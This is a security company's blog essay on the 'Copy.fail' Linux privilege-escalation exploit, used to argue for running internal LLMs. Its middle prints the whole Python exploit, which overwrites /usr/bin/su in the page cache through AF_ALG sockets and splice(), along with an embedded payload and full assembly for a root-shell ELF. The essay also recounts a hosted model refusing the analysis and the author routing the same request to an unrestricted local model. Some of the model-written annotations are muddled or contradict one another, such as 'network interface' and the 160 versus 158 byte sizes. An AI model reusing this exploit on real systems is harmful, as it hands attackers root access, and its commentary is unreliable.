Copy.fail: Why Internal LLMs Are Non-Negotiable for Security

This is a non-fiction essay about analyzing a real-world exploit, and what that process reveals about the fundamental tension between LLM-powered security workflows and cloud-based AI providers.

The Exploit: A Quick Summary of Copy.fail

Copy.fail is a privilege escalation exploit discovered in the wild. Its core mechanism is both elegant and terrifying: it corrupts the Linux page cache to replace /usr/bin/su in memory only — the on-disk binary remains untouched.

The exploit is alarming for two reasons: most Linux versions from the past seven years are vulnerable, and it may allow container escapes in environments such as Docker or Kubernetes.

Here's how it behaves on one of our VMs. The first time su is called, it asks for a password. After the exploit runs via python3 test.py, the next call to su no longer asks for one, because the binary has been patched in memory.

Then, I clear the cache with the following command, and the system's original su code is restored:

sync && echo 3 > /proc/sys/vm/drop_caches

Here is the step-by-step mechanism:

- Embeds a malicious ELF binary (zlib-compressed) that spawns a root shell via setuid(0) + execve("/bin/sh").

- Opens /usr/bin/su, a setuid-root binary present on virtually every Linux system.

- Uses AF_ALG sockets + splice() to overwrite the page cache backing /usr/bin/su with the payload, in 4-byte chunks. Because it targets the page cache rather than the filesystem, integrity checks like sha256sum still report the original hash. The file looks clean. The kernel serves the attacker's code.

- The next user who runs su executes the attacker's ELF, which calls setuid(0) and drops them into a root shell.

The exploit consists of a ~160-byte ELF payload (headers plus a few dozen bytes of shellcode) and a Python delivery script.



The External Model Trap

Our first instinct was to open the Python script in Claude Code, backed by Anthropic's hosted Opus model. This is the default workflow most teams reach for: paste the suspicious code, ask the AI to explain it, and move on.

The code went straight to Anthropic's servers. Every line of the exploit — the AF_ALG socket abuse, the splice() zero-copy trick, the embedded shellcode — was transmitted over the wire and processed on infrastructure we don't control.

For a publicly disclosed exploit like Copy.fail, this may seem harmless. The code is already on the internet. But consider the implications for actual security work:

- Client binaries under NDA. You're reverse-engineering a firmware image that belongs to a customer. Sending decompiled code to an external LLM is a direct breach of confidentiality.

- Zero-days in discovery. You've just found something. You don't know what it is yet. Uploading it to a cloud provider before disclosure is a leak of an in-flight vulnerability.

- Proprietary detection rules. The YARA rules, IDA scripts, or Ghidra annotations you ask the LLM to help refine — those encode your organization's investigative methodology.

- Telemetry and training data. Most providers reserve the right to use inputs for product improvement. Even if they don't today, their terms can change tomorrow.

More importantly, the model returned the following error:

==API Error: Claude Code is unable to respond to this request, which appears to violate our Usage Policy (https://www.anthropic.com/legal/aup). Please double press esc to edit your last message or start a new session for Claude Code to assist with a different task. If you are seeing this refusal repeatedly, try running /model claude-sonnet-4-20250514 to switch models.==

In our test, this meant the Opus model could not be used to analyze this kind of malicious snippet. The same workflow worked a few months ago, but it no longer does. Is this a policy change following the release of the "mythos" model? It could be.

As security researchers, we routinely work with sensitive and potentially dangerous material, and we take precautions accordingly. Being locked out by a provider's proprietary policy is a real obstacle to that work.

Running It Locally With an Internal Model

We ran the same analysis again, this time using our internal model on local hardware. Total hardware budget: under €30,000 for a single on-premise machine.

No data exfiltration. No third-party API. The exploit never leaves the office.
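One way to back that guarantee with tooling is to refuse any model endpoint that is not on the internal network before a prompt is sent. The sketch below is illustrative only: the function name, the hostname allowlist, and the example URLs are assumptions, not part of our actual setup.

```python
import ipaddress
from urllib.parse import urlparse

# Hypothetical allowlist of internal hostnames; adjust to your own network.
ALLOWED_HOSTNAMES = {"localhost", "llm.internal.example"}


def is_internal_endpoint(url: str) -> bool:
    """Return True only if the URL points at a loopback/private host
    or at an explicitly allowlisted internal hostname."""
    host = urlparse(url).hostname
    if host is None:
        return False
    if host in ALLOWED_HOSTNAMES:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Unknown DNS name: treat as external rather than resolving it.
        return False
    return addr.is_loopback or addr.is_private
```

A wrapper around the analysis client can call is_internal_endpoint() and abort when it returns False, so that a misconfigured base URL fails closed instead of silently sending code to a third party.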

Within 60 seconds, we had the same detailed breakdown: the ELF structure, the AF_ALG abuse, the page cache corruption vector, and the shellcode analysis.

The model's results are not optimal and could be improved; it is not strictly on par with external providers. But it was much faster than any cloud provider we tested, and the privacy difference is absolute. When we work on customer projects, we are bound to keep their data secure. Sending that data to an external provider would break that trust, whereas a private LLM is extremely helpful and can significantly extend our expertise.

The Python Script, Annotated by the Local Model

#!/usr/bin/env python3

"""

Detailed version of copyfail

================================

This script is a privilege escalation tool. It performs the following:

1. Decompresses an embedded ELF64 binary payload (a root-spawning shellcode).

2. Opens /usr/bin/su (the system privilege-escalation binary).

3. Replaces the su binary in 4-byte chunks over

an AF_ALG socket, using Linux splice() for zero-copy file I/O.

WARNING: This is malicious code. Do not execute.

"""

import os

import zlib

import socket

# ---------------------------------------------------------------------------

# Constants

# ---------------------------------------------------------------------------

SOL_ALG = 279

# Network interface

INTERFACE: str = "aead"

# Encrypted/cipher-text header referenced in bind():

# "authencesn(hmac(sha256),cbc(aes))"

# This is a fake interface description — it is passed as part of the

# bind() address tuple and is almost certainly ignored or causes

# bind() to silently accept garbage.

CIPHER_DESC: str = (

"authencesn(hmac(sha256),"

"cbc(aes))"

)

# Embedded zlib-compressed payload (an ELF64 binary containing:

# setuid(0) -> execve("/bin/sh") -> exit(0))

# The full payload is a minimal ELF64 executable with a single PT_LOAD

# segment loaded at virtual address 0x400000, entry point 0x400078.

# The binary is 160 bytes: 64-byte ELF header + 56-byte program header

# + 40 bytes of executable code at file offset 0x78.

EMBEDDED_PAYLOAD_HEX: str = (

"78daab77f57163626464800126063b"

"0610af82c101cc7760c0040e0c160c"

"301d209a154d16999e07e5c16806010"

"86578c0f0ff864c7e568f5e5b7e10f7"

"5b9675c44c7e56c3ff593611fcacfa49"

"9979fac5190c0c0c0032c310d3"

)

# The binary to steal from the target system

TARGET_BINARY_PATH: str = "/usr/bin/su"

CHUNK_SIZE: int = 4

# The payload sends each chunk prepended with 4 bytes of 0x41 ('A').

# These act as a separator / sync marker so the receiver can

# delineate chunks.

SYNC_MARKER: bytes = b"AAAA"

# Send flag: 32768 = MSG_MORE (send(2) / sendmsg(2))

# Tells the kernel to delay final packet transmission until the last

# chunk, reducing the number of network operations.

MSG_MORE: int = 32768

# ---------------------------------------------------------------------------

# Helper functions

# ---------------------------------------------------------------------------

def hex_to_bytes(hex_string: str) -> bytes:

"""Decode a hexadecimal string to raw bytes."""

return bytes.fromhex(hex_string)

def decompress_payload() -> bytes:

"""

Decompress the embedded ELF64 payload.

Returns

-------

bytes

The raw ELF64 binary (160 bytes), loaded in memory as

a complete executable image at virtual address 0x400000.

The executable code is 40 bytes starting at file offset 0x78

(virtual address 0x400078).

"""

raw_hex = EMBEDDED_PAYLOAD_HEX

return zlib.decompress(hex_to_bytes(raw_hex))

def write_chunk(

file_fd: int,

offset: int,

chunk: bytes,

interface_name: str = INTERFACE,

) -> None:

"""

Transfer data from the target file over an AF_ALG socket using

sendmsg() and splice() for zero-copy data transfer.

Execution overview:

1. Create an AF_ALG / SOCK_SEQPACKET socket.

2. Bind it to a tuple of (interface_name, cipher_description).

3. Set crypto socket options via setsockopt(SOL_ALG, ...).

4. Wait for an incoming connection (accept).

5. Send a crafted packet via sendmsg() with control messages.

6. Use splice() to redirect file contents through a pipe into the

connected socket without copying to user space.

7. Wait for a response packet (silent on error).

Parameters

----------

file_fd : int

File descriptor of the target file

offset : int

Byte offset within the file where data should be read from.

chunk : bytes

The 4-byte data chunk used to compute the transfer size.

interface_name : str

Network interface name component of the bind address.

"""

# ---------------------------------------------------------------

# Step 1 — Create AF_ALG / SOCK_SEQPACKET socket

# ---------------------------------------------------------------

packet_socket = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)

packet_socket.bind(

(interface_name, CIPHER_DESC),

)

packet_opt = SOL_ALG

# Set crypto operation via setsockopt(SOL_ALG, 1, ...).

# The data is a hex-encoded blob:

# 08 00 01 00 00 00 00 10 + 64 zero bytes

packet_socket.setsockopt(packet_opt, 1, hex_to_bytes('0800010000000010' + '0' * 64))

packet_socket.setsockopt(packet_opt, 5, None, 4)

conn, addr = packet_socket.accept()

transfer_size = offset + CHUNK_SIZE

proto_data = hex_to_bytes("00")

packet_payload = SYNC_MARKER + chunk

control_messages = [

(packet_opt, 3, proto_data * 4),

(packet_opt, 2, b"\x10" + proto_data * 19),

(packet_opt, 4, b"\x08" + proto_data * 3),

]

conn.sendmsg(

[packet_payload],

control_messages,

MSG_MORE,

)

# ---------------------------------------------------------------

# Step 6 — Zero-copy transfer via splice()

# ---------------------------------------------------------------

pipe_read_fd, pipe_write_fd = os.pipe()

# Reference to os.splice (non-standard; available on some Linux

# kernels for zero-copy file-to-pipe transfers).

splice_func = os.splice

# Redirect the file into the pipe's write end.

splice_func(

file_fd,

pipe_write_fd,

transfer_size,

offset_src=0,

)

# Redirect the pipe's read end into the socket.

splice_func(

pipe_read_fd,

conn.fileno(),

transfer_size,

)

# ---------------------------------------------------------------

# Step 7 — Wait for response (silent on error)

# ---------------------------------------------------------------

try:

conn.recv(8 + offset)

except Exception:

pass

# ---------------------------------------------------------------------------

# Main execution

# ---------------------------------------------------------------------------

# Step A: Open the target binary for reading

target_fd = os.open(

TARGET_BINARY_PATH,

os.O_RDONLY,

)

# Step B: Decompress the embedded payload

payload = decompress_payload()

# Step C: Iterate over the decompressed payload in 4-byte chunks

offset = 0

while offset < len(payload):

chunk = payload[offset:offset + CHUNK_SIZE]

write_chunk(

file_fd=target_fd,

offset=offset,

chunk=chunk,

)

offset += CHUNK_SIZE

Assembly Payload

; =============================================================================

; Payload — 160-byte ELF that replaces /usr/bin/su

; in the page cache. When an unprivileged user runs `su`, the kernel serves

; this from cache instead of the real binary. Because su has the setuid bit,

; this ELF executes as root, calls setuid(0)+execve("/bin/sh"), giving a root

; shell. The on-disk file remains untouched — only the page cache is corrupted.

; =============================================================================

;

; The payload has two parts:

; Part 1 (offsets 0x00–0x77): ELF header + program header table

; Part 2 (offsets 0x78–0x9D): x86-64 machine code

;

; The zlib-compressed blob in the exploit decompresses to these 160 raw bytes.

bits 64

org 0x400000 ; load address (p_vaddr)

; ---------------------------------------------------------------------------

; Part 1: ELF header (file offset 0x00, in-memory 0x400000–0x40003F)

; ---------------------------------------------------------------------------

ehdr:

e_ident:

db 0x7F, "ELF" ; magic

db 2 ; EI_CLASS = 64-bit

db 1 ; EI_DATA = little-endian

db 1 ; EI_VERSION = 1

db 0 ; EI_OSABI = System V

db 0, 0, 0, 0, 0, 0, 0 ; EI_ABIVERSION + padding

dw 2 ; e_type = ET_EXEC

dw 0x3E ; e_machine = EM_X86_64

dd 1 ; e_version = 1

dq _start ; e_entry = 0x400078

dq phdr - ehdr ; e_phoff = 0x40

dq 0 ; e_shoff = 0 (no sections)

dd 0 ; e_flags = 0

dw ehdr_size ; e_ehsize = 64

dw phdr_size ; e_phentsize= 56

dw 1 ; e_phnum = 1

dw 0 ; e_shentsize= 0

dw 0 ; e_shnum = 0

dw 0 ; e_shstrndx = 0

ehdr_size equ $ - ehdr ; = 64 bytes

; ---------------------------------------------------------------------------

; Part 1b: Program header table (file offset 0x40, in-memory 0x400040–0x400077)

; ---------------------------------------------------------------------------

phdr:

dd 1 ; p_type = PT_LOAD

dd 5 ; p_flags = PF_R | PF_X

dq 0 ; p_offset = 0 (entire file)

dq ehdr ; p_vaddr = 0x400000

dq ehdr ; p_paddr = 0x400000

dq filesize ; p_filesz = 0x9E

dq filesize ; p_memsz = 0x9E

dq 0x100000 ; p_align = 1 MiB (unusual but valid)

phdr_size equ $ - phdr ; = 56 bytes

; ---------------------------------------------------------------------------

; Part 2: Shellcode (file offset 0x78, in-memory 0x400078, e_entry)

; ---------------------------------------------------------------------------

_start:

; --- setuid(0) ---

xor eax, eax ; 31 c0

xor edi, edi ; 31 ff | rdi = 0

mov al, 105 ; b0 69 | __NR_setuid (105)

syscall ; 0f 05 | setuid(0)

; --- execve("/bin/sh", NULL, NULL) ---

lea rdi, [rel binsh] ; 48 8d 3d 0f 00 00 00

xor esi, esi ; 31 f6 | argv = NULL

push 59 ; 6a 3b | __NR_execve

pop rax ; 58

cdq ; 99 | rdx = 0 (envp = NULL)

syscall ; 0f 05 | execve("/bin/sh", NULL, NULL)

; --- exit(0) ---

xor edi, edi ; 31 ff | status = 0

push 60 ; 6a 3c | __NR_exit

pop rax ; 58

syscall ; 0f 05 | exit(0)

binsh: db "/bin/sh", 0 ; 2f 62 69 6e 2f 73 68 00

db 0, 0, 0

filesize equ $ - ehdr ; = 0x9E = 158
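As a side note for readers who want to check header fields like the ones annotated above without running anything, the standard ELF64 layouts can be parsed with Python's struct module. This is a minimal sketch: it packs a header and one program header from the field values quoted in the listing's comments (it contains no shellcode), then parses them back. The function names are hypothetical, and nothing here has been verified against the real payload.

```python
import struct

# Standard ELF64 layouts, little-endian, no padding.
ELF64_EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # 64 bytes
ELF64_PHDR = struct.Struct("<IIQQQQQQ")          # 56 bytes


def build_sample_headers() -> bytes:
    """Pack headers from the values quoted in the listing's comments."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)  # 16-byte e_ident
    ehdr = ELF64_EHDR.pack(ident, 2, 0x3E, 1, 0x400078, 0x40,
                           0, 0, 64, 56, 1, 0, 0, 0)
    phdr = ELF64_PHDR.pack(1, 5, 0, 0x400000, 0x400000,
                           0x9E, 0x9E, 0x100000)
    return ehdr + phdr


def parse_headers(blob: bytes) -> dict:
    """Parse the ELF64 header and the first program header."""
    if len(blob) < ELF64_EHDR.size + ELF64_PHDR.size:
        raise ValueError("blob too short for ELF64 header + program header")
    (ident, e_type, e_machine, _version, e_entry, e_phoff, _shoff, _flags,
     e_ehsize, e_phentsize, e_phnum, *_rest) = ELF64_EHDR.unpack_from(blob, 0)
    if ident[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    (p_type, p_flags, p_offset, p_vaddr, _paddr,
     p_filesz, _memsz, _align) = ELF64_PHDR.unpack_from(blob, e_phoff)
    return {
        "e_type": e_type,
        "e_machine": e_machine,
        "e_entry": e_entry,
        "e_ehsize": e_ehsize,
        "e_phentsize": e_phentsize,
        "e_phnum": e_phnum,
        "p_type": p_type,
        "p_flags": p_flags,
        "p_filesz": p_filesz,
        # File offset of the entry point within the single PT_LOAD segment.
        "entry_file_offset": e_entry - p_vaddr + p_offset,
    }
```

Calling parse_headers(build_sample_headers()) gives an entry point at file offset 0x78, which is 64 + 56 bytes into the file, matching the header sizes stated in the annotations.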

The Case for Internal LLMs in Security

The Copy.fail analysis crystallized something we'd been sensing for a while: the LLM your security team uses can be the weakest link in your data boundary.

What You Leak Without Realizing It

When you paste code into an external LLM, you rarely leak just one thing. In a typical analysis session, the LLM sees:

- The target binary or decompiled source — the core artifact under investigation.

- Your toolchain fingerprints — the output of your disassembler, the structure of your IDA/Ghidra exports, and your naming conventions.

- Your investigative hypotheses — the prompts you write encode what you suspect is important. An attacker reading those prompts knows exactly what you've noticed and what you haven't.

- Your blind spots — the things you ask the LLM to explain are the things your team didn't understand on the first pass.

This is an operational intelligence goldmine and a confidentiality nightmare rolled into one API call.

The Economics Have Shifted

The common objection to internal LLMs is cost. But the math has changed dramatically.

The machine that ran our Copy.fail analysis cost less than a single security engineer's annual conference and training budget. It handles every code review, every decompilation pass, and every report draft — and it never sends a byte outside the building.

What You Gain

Beyond confidentiality, running an internal model changes how your team works:

- No second-guessing. When analyzing a customer's confidential software, there's no internal debate about whether this particular snippet is "too sensitive" to share. Everything goes to the model. The model is yours.

- Auditability. Every prompt, every response, and every tool call lives on infrastructure you control. If a regulator or client asks what happened to their data, you can answer definitively — not with an API provider's privacy policy.

- No rate limits, no throttling, no API deprecation. The model is a machine in your rack. It runs when you need it, with no tokens-per-minute budget and no risk that the provider sunsets the model you depend on.

- Custom fine-tuning. A general-purpose model won't know your target architecture or proprietary protocols. An internal model can be fine-tuned on your historical analyses, your internal threat intelligence, and your specific hardware targets.

- Air-gap compatibility. Some analysis machines have no internet connection — by design, by compliance requirement, or by customer mandate. An external LLM is simply not an option. An internal model is.
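To make the auditability point concrete, here is a minimal sketch of an append-only audit log for model interactions. The record fields, function names, and the JSON Lines format are assumptions chosen for illustration; storing digests rather than raw text is one possible design, not a description of our deployment.

```python
import hashlib
import json
import time
from typing import Optional


def audit_record(prompt: str, response: str, model: str,
                 now: Optional[float] = None) -> dict:
    """Build one audit entry; contents are stored as SHA-256 digests."""
    return {
        "ts": now if now is not None else time.time(),
        "model": model,
        "prompt_sha256": hashlib.sha256(prompt.encode("utf-8")).hexdigest(),
        "response_sha256": hashlib.sha256(response.encode("utf-8")).hexdigest(),
    }


def append_audit(path: str, record: dict) -> None:
    """Append the record as one JSON line to a local log file."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(record, sort_keys=True) + "\n")
```

Because the log lives on the same infrastructure as the model, answering "what happened to this file?" becomes a lookup by digest rather than a request to a third party.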

The Pragmatic Path

We're not arguing that every organization should throw out their API subscriptions tomorrow. External models remain very useful for non-sensitive research, benchmarking, and getting a second opinion. But for security teams specifically, the default workflow should invert:

- Sensitive analysis → internal model first

- Public research, documentation, boilerplate → external API is fine
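The inverted default above can be expressed as a small routing rule. This is a sketch under assumptions: the sensitivity labels and backend names are hypothetical, and a real policy would likely need more categories and a human in the loop for labeling.

```python
from enum import Enum


class Sensitivity(Enum):
    PUBLIC = "public"                    # public research, docs, boilerplate
    INTERNAL = "internal"                # detection rules, internal tooling
    CLIENT_NDA = "client_nda"            # customer binaries or source
    UNDISCLOSED_VULN = "undisclosed"     # findings before disclosure


def choose_backend(sensitivity: Sensitivity) -> str:
    """Default to the internal model; only explicitly public work
    may go to an external API."""
    if sensitivity is Sensitivity.PUBLIC:
        return "external"
    return "internal"
```

The important design choice is the direction of the default: anything not explicitly labeled public stays on the internal model.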

This blog post has been reviewed by an internal LLM!